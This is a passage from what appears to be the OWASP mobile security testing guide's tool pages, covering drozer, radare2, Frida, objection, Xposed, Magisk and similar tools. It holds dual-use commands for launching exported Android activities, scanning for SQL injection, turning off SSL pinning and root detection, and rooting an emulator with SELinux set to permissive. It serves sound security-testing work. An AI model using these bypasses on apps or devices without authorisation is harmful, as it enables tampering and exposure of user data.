Again, without drozer this would have required several steps. The module app.package.attacksurface
lists activities, broadcast receivers, content providers and services that are exported, hence, they are public and can be accessed through other apps. Once we have identified our attack surface, we can interact with the IPC endpoints through drozer without having to write a separate standalone app as it would be required for certain tasks such as communicating with a content provider.
For example, if the app has an exported Activity that leaks sensitive information we can invoke it with the Drozer module app.activity.start
:
dz> run app.activity.start --component <package> <component name>\n
This previous command will start the activity, hopefully leaking some sensitive information. Drozer has modules for every type of IPC mechanism. Download InsecureBankv2 if you would like to try the modules with an intentionally vulnerable application that illustrates common problems related to IPC endpoints. Pay close attention to the modules in the scanner category as they are very helpful automatically detecting vulnerabilities even in system packages, specially if you are using a ROM provided by your cellphone company. Even SQL injection vulnerabilities in system packages by Google have been identified in the past with drozer.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#other-drozer-commands","title":"Other Drozer commands","text":"Here's a non-exhaustive list of commands you can use to start exploring on Android:
# List all the installed packages\n$ dz> run app.package.list\n\n# Find the package name of a specific app\n$ dz> run app.package.list -f (string to be searched)\n\n# See basic information\n$ dz> run app.package.info -a (package name)\n\n# Identify the exported application components\n$ dz> run app.package.attacksurface (package name)\n\n# Identify the list of exported Activities\n$ dz> run app.activity.info -a (package name)\n\n# Launch the exported Activities\n$ dz> run app.activity.start --component (package name) (component name)\n\n# Identify the list of exported Broadcast receivers\n$ dz> run app.broadcast.info -a (package name)\n\n# Send a message to a Broadcast receiver\n$ dz> run app.broadcast.send --action (broadcast receiver name) -- extra (number of arguments)\n\n# Detect SQL injections in content providers\n$ dz> run scanner.provider.injection -a (package name)\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#other-drozer-resources","title":"Other Drozer resources","text":"Other resources where you might find useful information are:
gplaycli is a Python based CLI tool to search, install and update Android applications from the Google Play Store. Follow the installation steps and you're ready to run it. gplaycli offers several options, please refer to its help (-h
) for more information.
If you're unsure about the package name (or AppID) of an app, you may perform a keyword based search for APKs (-s
):
$ gplaycli -s \"google keep\"\n\nTitle Creator Size Last Update AppID Version\n\nGoogle Keep - notes and lists Google LLC 15.78MB 4 Sep 2019 com.google.android.keep 193510330\nMaps - Navigate & Explore Google LLC 35.25MB 16 May 2019 com.google.android.apps.maps 1016200134\nGoogle Google LLC 82.57MB 30 Aug 2019 com.google.android.googlequicksearchbox 301008048\n
Note that regional (Google Play) restrictions apply when using gplaycli. In order to access apps that are restricted in your country you can use alternative app stores such as the ones described in \"Alternative App Stores\".
"},{"location":"MASTG/tools/android/MASTG-TOOL-0017/","title":"House","text":"House is a runtime mobile application analysis toolkit for Android apps, developed and maintained by the NCC Group and is written in Python.
It's leveraging a running Frida server on a rooted device or the Frida gadget in a repackaged Android app. The intention of House is to allow an easy way of prototyping Frida scripts via its convenient web GUI.
The installation instructions and \"how-to guide\" of House can be found in the Readme of the Github repo.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0018/","title":"jadx","text":"jadx (Dex to Java Decompiler) is a command line and GUI tool for producing Java source code from Android DEX and APK files - https://github.com/skylot/jadx
"},{"location":"MASTG/tools/android/MASTG-TOOL-0019/","title":"jdb","text":"A Java Debugger which allows to set breakpoints and print application variables. jdb uses the JDWP protocol - https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jdb.html
"},{"location":"MASTG/tools/android/MASTG-TOOL-0020/","title":"JustTrustMe","text":"An Xposed Module to bypass SSL certificate pinning - https://github.com/Fuzion24/JustTrustMe
"},{"location":"MASTG/tools/android/MASTG-TOOL-0021/","title":"Magisk","text":"Magisk
(\"Magic Mask\") is one way to root your Android device. It's specialty lies in the way the modifications on the system are performed. While other rooting tools alter the actual data on the system partition, Magisk does not (which is called \"systemless\"). This enables a way to hide the modifications from root-sensitive applications (e.g. for banking or games) and allows using the official Android OTA upgrades without the need to unroot the device beforehand.
You can get familiar with Magisk reading the official documentation on GitHub. If you don't have Magisk installed, you can find installation instructions in the documentation. If you use an official Android version and plan to upgrade it, Magisk provides a tutorial on GitHub.
Learn more about rooting your device with Magisk.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0022/","title":"Proguard","text":"ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes and can also be used to delete logging-related code.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0023/","title":"RootCloak Plus","text":"A Cydia Substrate Module used to check for commonly known indications of root - https://github.com/devadvance/rootcloakplus
"},{"location":"MASTG/tools/android/MASTG-TOOL-0024/","title":"Scrcpy","text":"Scrcpy provides display and control of Android devices connected over USB (or TCP/IP). It does not require any root access and it works on GNU/Linux, Windows and macOS.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0025/","title":"SSLUnpinning","text":"An Xposed Module to bypass SSL certificate pinning - https://github.com/ac-pm/SSLUnpinning_Xposed
"},{"location":"MASTG/tools/android/MASTG-TOOL-0026/","title":"Termux","text":"Termux is a terminal emulator for Android that provides a Linux environment that works directly with or without rooting and with no setup required. The installation of additional packages is a trivial task thanks to its own APT package manager (which makes a difference in comparison to other terminal emulator apps). You can search for specific packages by using the command pkg search <pkg_name>
and install packages with pkg install <pkg_name>
. You can install Termux straight from Google Play.
Xposed does not work on Android 9 (API level 28). However, it was unofficially ported in 2019 under the name EdXposed, supporting Android 8-10 (API level 26 till 29). You can find the code and usage examples at EdXposed Github repo.
Xposed is a framework that allows to modify the system or application aspect and behavior at runtime, without modifying any Android application package (APK) or re-flashing. Technically, it is an extended version of Zygote that exports APIs for running Java code when a new process is started. Running Java code in the context of the newly instantiated app makes it possible to resolve, hook, and override Java methods belonging to the app. Xposed uses reflection to examine and modify the running app. Changes are applied in memory and persist only during the process' runtime since the application binaries are not modified.
To use Xposed, you need to first install the Xposed framework on a rooted device as explained on XDA-Developers Xposed framework hub. Modules can be installed through the Xposed Installer app, and they can be toggled on and off through the GUI.
Note: given that a plain installation of the Xposed framework is easily detected with SafetyNet, we recommend using Magisk to install Xposed. This way, applications with SafetyNet attestation should have a higher chance of being testable with Xposed modules.
Xposed has been compared to Frida. When you run Frida server on a rooted device, you will end up with a similarly effective setup. Both frameworks deliver a lot of value when you want to do dynamic instrumentation. When Frida crashes the app, you can try something similar with Xposed. Next, similar to the abundance of Frida scripts, you can easily use one of the many modules that come with Xposed, such as the earlier discussed module to bypass SSL pinning (JustTrustMe and SSLUnpinning). Xposed includes other modules, such as Inspeckage which allow you to do more in depth application testing as well. On top of that, you can create your own modules as well to patch often used security mechanisms of Android applications.
Xposed can also be installed on an emulator through the following script:
#!/bin/sh\necho \"Start your emulator with 'emulator -avd NAMEOFX86A8.0 -writable-system -selinux permissive -wipe-data'\"\nadb root && adb remount\nadb install SuperSU\\ v2.79.apk #binary can be downloaded from http://www.supersu.com/download\nadb push root_avd-master/SuperSU/x86/su /system/xbin/su\nadb shell chmod 0755 /system/xbin/su\nadb shell setenforce 0\nadb shell su --install\nadb shell su --daemon&\nadb push busybox /data/busybox #binary can be downloaded from https://busybox.net/\n# adb shell \"mount -o remount,rw /system && mv /data/busybox /system/bin/busybox && chmod 755 /system/bin/busybox && /system/bin/busybox --install /system/bin\"\nadb shell chmod 755 /data/busybox\nadb shell 'sh -c \"./data/busybox --install /data\"'\nadb shell 'sh -c \"mkdir /data/xposed\"'\nadb push xposed8.zip /data/xposed/xposed.zip #can be downloaded from https://dl-xda.xposed.info/framework/\nadb shell chmod 0755 /data/xposed\nadb shell 'sh -c \"./data/unzip /data/xposed/xposed.zip -d /data/xposed/\"'\nadb shell 'sh -c \"cp /data/xposed/xposed/META-INF/com/google/android/*.* /data/xposed/xposed/\"'\necho \"Now adb shell and do 'su', next: go to ./data/xposed/xposed, make flash-script.sh executable and run it in that directory after running SUperSU\"\necho \"Next, restart emulator\"\necho \"Next, adb install XposedInstaller_3.1.5.apk\"\necho \"Next, run installer and then adb reboot\"\necho \"Want to use it again? Start your emulator with 'emulator -avd NAMEOFX86A8.0 -writable-system -selinux permissive'\"\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0028/","title":"radare2 for Android","text":"radare2 (r2) is a popular open source reverse engineering framework for disassembling, debugging, patching and analyzing binaries that is scriptable and supports many architectures and file formats including Android and iOS apps. For Android, Dalvik DEX (odex, multidex), ELF (executables, .so, ART) and Java (JNI and Java classes) are supported. It also contains several useful scripts that can help you during mobile application analysis as it offers low level disassembling and safe static analysis that comes in handy when traditional tools fail.
radare2 implements a rich command line interface (CLI) where you can perform the mentioned tasks. However, if you're not really comfortable using the CLI for reverse engineering you may want to consider using the Web UI (via the -H
flag) or the even more convenient Qt and C++ GUI version called iaito. Do keep in mind that the CLI, and more concretely its Visual Mode and its scripting capabilities (r2pipe), are the core of radare2's power and it's definitely worth learning how to use it.
Please refer to radare2's official installation instructions. We highly recommend to always install radare2 from the GitHub version instead of via common package managers such as APT. Radare2 is in very active development, which means that third party repositories are often outdated.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0028/#using-radare2","title":"Using radare2","text":"The radare2 framework comprises a set of small utilities that can be used from the r2 shell or independently as CLI tools. These utilities include rabin2
, rasm2
, rahash2
, radiff2
, rafind2
, ragg2
, rarun2
, rax2
, and of course r2
, which is the main one.
For example, you can use rafind2
to read strings directly from an encoded Android Manifest (AndroidManifest.xml):
# Permissions\n$ rafind2 -ZS permission AndroidManifest.xml\n# Activities\n$ rafind2 -ZS activity AndroidManifest.xml\n# Content providers\n$ rafind2 -ZS provider AndroidManifest.xml\n# Services\n$ rafind2 -ZS service AndroidManifest.xml\n# Receivers\n$ rafind2 -ZS receiver AndroidManifest.xml\n
Or use rabin2
to get information about a binary file:
$ rabin2 -I UnCrackable-Level1/classes.dex\narch dalvik\nbaddr 0x0\nbinsz 5528\nbintype class\nbits 32\ncanary false\nretguard false\nclass 035\ncrypto false\nendian little\nhavecode true\nladdr 0x0\nlang dalvik\nlinenum false\nlsyms false\nmachine Dalvik VM\nmaxopsz 16\nminopsz 1\nnx false\nos linux\npcalign 0\npic false\nrelocs false\nsanitiz false\nstatic true\nstripped false\nsubsys java\nva true\nsha1 12-5508c b7fafe72cb521450c4470043caa332da61d1bec7\nadler32 12-5528c 00000000\n
Type rabin2 -h
to see all options:
$ rabin2 -h\nUsage: rabin2 [-AcdeEghHiIjlLMqrRsSUvVxzZ] [-@ at] [-a arch] [-b bits] [-B addr]\n [-C F:C:D] [-f str] [-m addr] [-n str] [-N m:M] [-P[-P] pdb]\n [-o str] [-O str] [-k query] [-D lang symname] file\n -@ [addr] show section, symbol or import at addr\n -A list sub-binaries and their arch-bits pairs\n -a [arch] set arch (x86, arm, .. or <arch>_<bits>)\n -b [bits] set bits (32, 64 ...)\n -B [addr] override base address (pie bins)\n -c list classes\n -cc list classes in header format\n -H header fields\n -i imports (symbols imported from libraries)\n -I binary info\n -j output in json\n ...\n
Use the main r2
utility to access the r2 shell. You can load DEX binaries just like any other binary:
r2 classes.dex\n
Enter r2 -h
to see all available options. A very commonly used flag is -A
, which triggers an analysis after loading the target binary. However, this should be used sparingly and with small binaries as it is very time and resource consuming. You can learn more about this in the chapter \"Tampering and Reverse Engineering on Android\".
Once in the r2 shell, you can also access functions offered by the other radare2 utilities. For example, running i
will print the information of the binary, exactly as rabin2 -I
does.
To print all the strings use rabin2 -Z
or the command iz
(or the less verbose izq
) from the r2 shell.
[0x000009c8]> izq\n0xc50 39 39 /dev/com.koushikdutta.superuser.daemon/\n0xc79 25 25 /system/app/Superuser.apk\n...\n0xd23 44 44 5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\n0xd51 32 32 8d127684cbc37c17616d806cf50473cc\n0xd76 6 6 <init>\n0xd83 10 10 AES error:\n0xd8f 20 20 AES/ECB/PKCS7Padding\n0xda5 18 18 App is debuggable!\n0xdc0 9 9 CodeCheck\n0x11ac 7 7 Nope...\n0x11bf 14 14 Root detected!\n
Most of the time you can append special options to your commands such as q
to make the command less verbose (quiet) or j
to give the output in JSON format (use ~{}
to prettify the JSON string).
[0x000009c8]> izj~{}\n[\n {\n \"vaddr\": 3152,\n \"paddr\": 3152,\n \"ordinal\": 1,\n \"size\": 39,\n \"length\": 39,\n \"section\": \"file\",\n \"type\": \"ascii\",\n \"string\": \"L2Rldi9jb20ua291c2hpa2R1dHRhLnN1cGVydXNlci5kYWVtb24v\"\n },\n {\n \"vaddr\": 3193,\n \"paddr\": 3193,\n \"ordinal\": 2,\n \"size\": 25,\n \"length\": 25,\n \"section\": \"file\",\n \"type\": \"ascii\",\n \"string\": \"L3N5c3RlbS9hcHAvU3VwZXJ1c2VyLmFwaw==\"\n },\n
You can print the class names and their methods with the r2 command ic
(information classes).
[0x000009c8]> ic\n...\n0x0000073c [0x00000958 - 0x00000abc] 356 class 5 Lsg/vantagepoint/uncrackable1/MainActivity\n:: Landroid/app/Activity;\n0x00000958 method 0 pC Lsg/vantagepoint/uncrackable1/MainActivity.method.<init>()V\n0x00000970 method 1 P Lsg/vantagepoint/uncrackable1/MainActivity.method.a(Ljava/lang/String;)V\n0x000009c8 method 2 r Lsg/vantagepoint/uncrackable1/MainActivity.method.onCreate (Landroid/os/Bundle;)V\n0x00000a38 method 3 p Lsg/vantagepoint/uncrackable1/MainActivity.method.verify (Landroid/view/View;)V\n0x0000075c [0x00000acc - 0x00000bb2] 230 class 6 Lsg/vantagepoint/uncrackable1/a :: Ljava/lang/Object;\n0x00000acc method 0 sp Lsg/vantagepoint/uncrackable1/a.method.a(Ljava/lang/String;)Z\n0x00000b5c method 1 sp Lsg/vantagepoint/uncrackable1/a.method.b(Ljava/lang/String;)[B\n
You can print the imported methods with the r2 command ii
(information imports).
[0x000009c8]> ii\n[Imports]\nNum Vaddr Bind Type Name\n...\n 29 0x000005cc NONE FUNC Ljava/lang/StringBuilder.method.append(Ljava/lang/String;) Ljava/lang/StringBuilder;\n 30 0x000005d4 NONE FUNC Ljava/lang/StringBuilder.method.toString()Ljava/lang/String;\n 31 0x000005dc NONE FUNC Ljava/lang/System.method.exit(I)V\n 32 0x000005e4 NONE FUNC Ljava/lang/System.method.getenv(Ljava/lang/String;)Ljava/lang/String;\n 33 0x000005ec NONE FUNC Ljavax/crypto/Cipher.method.doFinal([B)[B\n 34 0x000005f4 NONE FUNC Ljavax/crypto/Cipher.method.getInstance(Ljava/lang/String;) Ljavax/crypto/Cipher;\n 35 0x000005fc NONE FUNC Ljavax/crypto/Cipher.method.init(ILjava/security/Key;)V\n 36 0x00000604 NONE FUNC Ljavax/crypto/spec/SecretKeySpec.method.<init>([BLjava/lang/String;)V\n
A common approach when inspecting a binary is to search for something, navigate to it and visualize it in order to interpret the code. One of the ways to find something using radare2 is by filtering the output of specific commands, i.e. to grep them using ~
plus a keyword (~+
for case-insensitive). For example, we might know that the app is verifying something, we can inspect all radare2 flags and see where we find something related to \"verify\".
When loading a file, radare2 tags everything it's able to find. These tagged names or references are called flags. You can access them via the command f
.
In this case we will grep the flags using the keyword \"verify\":
[0x000009c8]> f~+verify\n0x00000a38 132 sym.Lsg_vantagepoint_uncrackable1_MainActivity.method. \\\nverify_Landroid_view_View__V\n0x00000a38 132 method.public.Lsg_vantagepoint_uncrackable1_MainActivity. \\\nLsg_vantagepoint_uncrackable1\n _MainActivity.method.verify_Landroid_view_View__V\n0x00001400 6 str.verify\n
It seems that we've found one method in 0x00000a38 (that was tagged two times) and one string in 0x00001400. Let's navigate (seek) to that method by using its flag:
[0x000009c8]> s sym.Lsg_vantagepoint_uncrackable1_MainActivity.method. \\\nverify_Landroid_view_View__V\n
And of course you can also use the disassembler capabilities of r2 and print the disassembly with the command pd
(or pdf
if you know you're already located in a function).
[0x00000a38]> pd\n
r2 commands normally accept options (see pd?
), e.g. you can limit the opcodes displayed by appending a number (\"N\") to the command pd N
.
Instead of just printing the disassembly to the console you may want to enter the so-called Visual Mode by typing V
.
By default, you will see the hexadecimal view. By typing p
you can switch to different views, such as the disassembly view:
Radare2 offers a Graph Mode that is very useful to follow the flow of the code. You can access it from the Visual Mode by typing V
:
This is only a selection of some radare2 commands to start getting some basic information from Android binaries. Radare2 is very powerful and has dozens of commands that you can find on the radare2 command documentation. Radare2 will be used throughout the guide for different purposes such as reversing code, debugging or performing binary analysis. We will also use it in combination with other frameworks, especially Frida (see the r2frida section for more information).
Please refer to the chapter \"Tampering and Reverse Engineering on Android\" for more detailed use of radare2 on Android, especially when analyzing native libraries. You may also want to read the official radare2 book.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0029/","title":"objection for Android","text":"Objection offers several features specific to Android. You can find the full list of features on the project's page, but here are a few interesting ones:
If you have a rooted device with frida-server installed, Objection can connect directly to the running Frida server to provide all its functionality without needing to repackage the application. However, it is not always possible to root an Android device or the app may contain advanced RASP controls for root detection, so injecting a frida-gadget may be the easiest way to bypass those controls.
The ability to perform advanced dynamic analysis on non-rooted devices is one of the features that makes Objection incredibly useful. After following the repackaging process you will be able to run all the aforementioned commands which make it very easy to quickly analyze an application, or bypass basic security controls.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0029/#using-objection-on-android","title":"Using Objection on Android","text":"Starting up Objection depends on whether you've patched the APK or whether you are using a rooted device running Frida-server. For running a patched APK, objection will automatically find any attached devices and search for a listening Frida gadget. However, when using frida-server, you need to explicitly tell frida-server which application you want to analyze.
# Connecting to a patched APK\nobjection explore\n\n# Find the correct name using frida-ps\n$ frida-ps -Ua | grep -i telegram\n30268 Telegram org.telegram.messenger\n\n# Connecting to the Telegram app through Frida-server\n$ objection --gadget=\"org.telegram.messenger\" explore\n
Once you are in the Objection REPL, you can execute any of the available commands. Below is an overview of some of the most useful ones:
# Show the different storage locations belonging to the app\n$ env\n\n# Disable popular ssl pinning methods\n$ android sslpinning disable\n\n# List items in the keystore\n$ android keystore list\n\n# Try to circumvent root detection\n$ android root disable\n
More information on using the Objection REPL can be found on the Objection Wiki
"},{"location":"MASTG/tools/android/MASTG-TOOL-0030/","title":"Angr","text":"Angr is a Python framework for analyzing binaries. It is useful for both static and dynamic symbolic (\"concolic\") analysis. In other words: given a binary and a requested state, Angr will try to get to that state, using formal methods (a technique used for static code analysis) to find a path, as well as brute forcing. Using angr to get to the requested state is often much faster than taking manual steps for debugging and searching the path towards the required state. Angr operates on the VEX intermediate language and comes with a loader for ELF/ARM binaries, so it is perfect for dealing with native code, such as native Android binaries.
Angr allows for disassembly, program instrumentation, symbolic execution, control-flow analysis, data-dependency analysis, decompilation and more, given a large set of plugins.
Since version 8, Angr is based on Python 3, and can be installed with pip on *nix operating systems, macOS and Windows:
pip install angr\n
Some of angr's dependencies contain forked versions of the Python modules Z3 and PyVEX, which would overwrite the original versions. If you're using those modules for anything else, you should create a dedicated virtual environment with Virtualenv. Alternatively, you can always use the provided docker container. See the installation guide for more details.
Comprehensive documentation, including an installation guide, tutorials, and usage examples are available on Angr's Gitbooks page. A complete API reference is also available.
You can use angr from a Python REPL - such as iPython - or script your approaches. Although angr has a bit of a steep learning curve, we do recommend using it when you want to brute force your way to a given state of an executable. Please see the \"Symbolic Execution\" section of the \"Reverse Engineering and Tampering\" chapter as a great example on how this can work.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0099/","title":"FlowDroid","text":"FlowDroid is an open-source tool based in soot, a framework dedicated to analyzing and translating Java bytecode for easier analysis. The tool handles the nuances of Android app lifecycles (like onCreate
, onStart
, onPause
, and others) and its UI components during analysis and performs taint analysis that is:
FlowDroid can be used in two ways: as a standalone command line tool for quick analyses or as a library for more complex investigations. In addition to performing taint analysis, FlowDroid can also generate call graphs, as illustrated in this blog post.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0031/","title":"Frida","text":"Frida is a free and open source dynamic code instrumentation toolkit written by Ole Andr\u00e9 Vadla Ravn\u00e5s that works by injecting the QuickJS JavaScript engine (previously Duktape and V8) into the instrumented process. Frida lets you execute snippets of JavaScript into native apps on Android and iOS (as well as on other platforms).
To install Frida locally, simply run:
pip install frida-tools\n
Or refer to the installation page for more details.
Code can be injected in several ways. For example, Xposed permanently modifies the Android app loader, providing hooks for running your own code every time a new process is started. In contrast, Frida implements code injection by writing code directly into the process memory. When attached to a running app:
frida-agent.so
).Frida offers three modes of operation:
LD_PRELOAD
or DYLD_INSERT_LIBRARIES
. You can configure the frida-gadget to run autonomously and load a script from the filesystem (e.g. path relative to where the Gadget binary resides).Independently of the chosen mode, you can make use of the Frida JavaScript APIs to interact with the running process and its memory. Some of the fundamental APIs are:
Frida also provides a couple of simple tools built on top of the Frida API and available right from your terminal after installing frida-tools via pip. For instance:
frida
) for quick script prototyping and try/error scenarios.frida-ps
to obtain a list of all apps (or processes) running on the device including their names, identifiers and PIDs.frida-ls-devices
to list your connected devices running Frida servers or agents.frida-trace
to quickly trace methods that are part of an iOS app or that are implemented inside an Android native library.In addition, you'll also find several open source Frida-based tools, such as:
We will be using all of these tools throughout the guide.
You can use these tools as-is, tweak them to your needs, or take as excellent examples on how to use the APIs. Having them as an example is very helpful when you write your own hooking scripts or when you build introspection tools to support your reverse engineering workflow.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0032/","title":"Frida CodeShare","text":"Frida CodeShare is a repository containing a collection of ready-to-run Frida scripts which can enormously help when performing concrete tasks both on Android as on iOS as well as also serve as inspiration to build your own scripts. Two representative examples are:
Using them is as simple as including the --codeshare <handler>
flag and a handler when using the Frida CLI. For example, to use \"ObjC method observer\", enter the following:
frida --codeshare mrmacete/objc-method-observer -f YOUR_BINARY\n
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0033/","title":"Ghidra","text":"Ghidra is an open source software reverse engineering (SRE) suite of tools developed by the United State of America's National Security Agency's (NSA) Research Directorate. Ghidra is a versatile tool which comprises of a disassembler, decompiler and a built-in scripting engine for advanced usage. Please refer to the installation guide on how to install it and also look at the cheat sheet for a first overview of available commands and shortcuts. In this section, we will have walk-through on how to create a project, view disassembly and decompiled code for a binary.
Start Ghidra using ghidraRun
(*nix) or ghidraRun.bat
(Windows), depending on the platform you are on. Once Ghidra is fired up, create a new project by specifying the project directory. You will be greeted by a window as shown below:
In your new Active Project you can import an app binary by going to File -> Import File and choosing the desired file.
If the file can be properly processed, Ghidra will show meta-information about the binary before starting the analysis.
To get the disassembled code for the binary file chosen above, double click the imported file from the Active Project window. Click yes and analyze for auto-analysis on the subsequent windows. Auto-analysis will take some time depending on the size of the binary, the progress can be tracked in the bottom right corner of the code browser window. Once auto-analysis is completed you can start exploring the binary.
The most important windows to explore a binary in Ghidra are the Listing (Disassembly) window, the Symbol Tree window and the Decompiler window, which shows the decompiled version of the function selected for disassembly. The Display Function Graph option shows control flow graph of the selected function.
There are many other functionalities available in Ghidra and most of them can be explored by opening the Window menu. For example, if you want to examine the strings present in the binary, open the Defined Strings option. We will discuss other advanced functionalities while analyzing various binaries for Android and iOS platforms in the coming chapters.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0034/","title":"LIEF","text":"The purpose of LIEF is to provide a cross platform library to parse, modify and abstract ELF, PE and MachO formats. With it you can, for instance, inject a certain library as a dependency of a native library, which an application already loads by default. - https://lief.quarkslab.com/
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0035/","title":"MobSF","text":"MobSF (Mobile Security Framework) is an automated, all-in-one mobile application pentesting framework capable of performing static and dynamic analysis. The easiest way of getting MobSF started is via Docker.
docker pull opensecurity/mobile-security-framework-mobsf\ndocker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest\n
Or install and start it locally on your host computer by running:
# Setup\ngit clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git\ncd Mobile-Security-Framework-MobSF\n./setup.sh # For Linux and Mac\nsetup.bat # For Windows\n\n# Installation process\n./run.sh # For Linux and Mac\nrun.bat # For Windows\n
Once you have MobSF up and running you can open it in your browser by navigating to http://127.0.0.1:8000. Simply drag the APK you want to analyze into the upload area and MobSF will start its job.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0036/","title":"r2frida","text":"r2frida is a project that allows radare2 to connect to Frida, effectively merging the powerful reverse engineering capabilities of radare2 with the dynamic instrumentation toolkit of Frida. r2frida can be used in both on Android and iOS, allowing you to:
Please refer to r2frida's official installation instructions.
With frida-server running, you should now be able to attach to it using the pid, spawn path, host and port, or device-id. For example, to attach to PID 1234:
r2 frida://1234\n
For more examples on how to connect to frida-server, see the usage section in the r2frida's README page.
The following examples were executed using an Android app but also apply to iOS apps.
Once in the r2frida session, all commands start with :
or =!
. For example, in radare2 you'd run i
to display the binary information, but in r2frida you'd use :i
.
See all options with r2 frida://?
.
[0x00000000]> :i\narch x86\nbits 64\nos linux\npid 2218\nuid 1000\nobjc false\nruntime V8\njava false\ncylang false\npageSize 4096\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\n
To search in memory for a specific keyword, you may use the search command \\/
:
[0x00000000]> \\/ unacceptable\nSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 62 6c 65\nSearching 12 bytes in [0x0000561f05ebf000-0x0000561f05eca000]\n...\nSearching 12 bytes in [0xffffffffff600000-0xffffffffff601000]\nhits: 23\n0x561f072d89ee hit12_0 unacceptable policyunsupported md algorithmvar bad valuec\n0x561f0732a91a hit12_1 unacceptableSearching 12 bytes: 75 6e 61 63 63 65 70 74 61\n
To output the search results in JSON format, we simply add j
to our previous search command (just as we do in the r2 shell). This can be used in most of the commands:
[0x00000000]> \\/j unacceptable\nSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 62 6c 65\nSearching 12 bytes in [0x0000561f05ebf000-0x0000561f05eca000]\n...\nSearching 12 bytes in [0xffffffffff600000-0xffffffffff601000]\nhits: 23\n{\"address\":\"0x561f072c4223\",\"size\":12,\"flag\":\"hit14_1\",\"content\":\"unacceptable \\\npolicyunsupported md algorithmvar bad valuec0\"},{\"address\":\"0x561f072c4275\", \\\n\"size\":12,\"flag\":\"hit14_2\",\"content\":\"unacceptableSearching 12 bytes: 75 6e 61 \\\n63 63 65 70 74 61\"},{\"address\":\"0x561f072c42c8\",\"size\":12,\"flag\":\"hit14_3\", \\\n\"content\":\"unacceptableSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 \"},\n...\n
To list the loaded libraries use the command :il
and filter the results using the internal grep from radare2 with the command ~
. For example, the following command will list the loaded libraries matching the keywords keystore
, ssl
and crypto
:
[0x00000000]> :il~keystore,ssl,crypto\n0x00007f3357b8e000 libssl.so.1.1\n0x00007f3357716000 libcrypto.so.1.1\n
Similarly, to list the exports and filter the results by a specific keyword:
[0x00000000]> :iE libssl.so.1.1~CIPHER\n0x7f3357bb7ef0 f SSL_CIPHER_get_bits\n0x7f3357bb8260 f SSL_CIPHER_find\n0x7f3357bb82c0 f SSL_CIPHER_get_digest_nid\n0x7f3357bb8380 f SSL_CIPHER_is_aead\n0x7f3357bb8270 f SSL_CIPHER_get_cipher_nid\n0x7f3357bb7ed0 f SSL_CIPHER_get_name\n0x7f3357bb8340 f SSL_CIPHER_get_auth_nid\n0x7f3357bb7930 f SSL_CIPHER_description\n0x7f3357bb8300 f SSL_CIPHER_get_kx_nid\n0x7f3357bb7ea0 f SSL_CIPHER_get_version\n0x7f3357bb7f10 f SSL_CIPHER_get_id\n
To list or set a breakpoint use the command db. This is useful when analyzing/modifying memory:
[0x00000000]> :db\n
Finally, remember that you can also run Frida JavaScript code with \\.
plus the name of the script:
[0x00000000]> \\. agent.js\n
You can find more examples on how to use r2frida on their Wiki project.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0037/","title":"RMS Runtime Mobile Security","text":"RMS - Runtime Mobile Security is a runtime mobile application analysis toolkit, supporting Android and iOS Apps. It offers a web GUI and is written in Python.
It's leveraging a running Frida server on a jailbroken device with the following out-of-box functionalities:
The installation instructions and \"how-to guide\" of RMS can be found in the Readme of the Github repo.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0038/","title":"objection","text":"Objection is a \"runtime mobile exploration toolkit, powered by Frida\". Its main goal is to allow security testing on non-rooted devices through an intuitive interface.
Objection achieves this goal by providing you with the tools to easily inject the Frida gadget into an application by repackaging it. This way, you can deploy the repackaged app to the non-rooted/non-jailbroken device by sideloading it. Objection also provides a REPL that allows you to interact with the application, giving you the ability to perform any action that the application can perform.
Objection can be installed through pip as described on Objection's Wiki.
pip3 install objection\n
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0098/","title":"iaito","text":"Iaito is the official graphical user interface for radare2, an open-source reverse engineering framework. This user-friendly tool simplifies the reverse engineering process by providing a graphical interface that integrates seamlessly with radare2's powerful features. With a focus on simplicity, keybindings, and radare2-style workflows, Iaito is a valuable resource for both experienced reverse engineers and those new to the field, offering a more accessible and efficient way to work with radare2.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/","title":"Frida for iOS","text":"Frida supports interaction with the Objective-C runtime through the ObjC API. You'll be able to hook and call both Objective-C and native functions inside the process and its native libraries. Your JavaScript snippets have full access to memory, e.g. to read and/or write any structured data.
Here are some tasks that Frida APIs offers and are relevant or exclusive on iOS:
Remember that on iOS, you can also benefit from the built-in tools provided when installing Frida, which include the Frida CLI (frida
), frida-ps
, frida-ls-devices
and frida-trace
, to name a few.
There's a frida-trace
feature exclusive on iOS worth highlighting: tracing Objective-C APIs using the -m
flag and wildcards. For example, tracing all methods including \"HTTP\" in their name and belonging to any class whose name starts with \"NSURL\" is as easy as running:
frida-trace -U YourApp -m \"*[NSURL* *HTTP*]\"\n
For a quick start you can go through the iOS examples.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#installing-frida-on-ios","title":"Installing Frida on iOS","text":"To connect Frida to an iOS app, you need a way to inject the Frida runtime into that app. This is easy to do on a jailbroken device: just install frida-server
through Cydia. Once it has been installed, the Frida server will automatically run with root privileges, allowing you to easily inject code into any process.
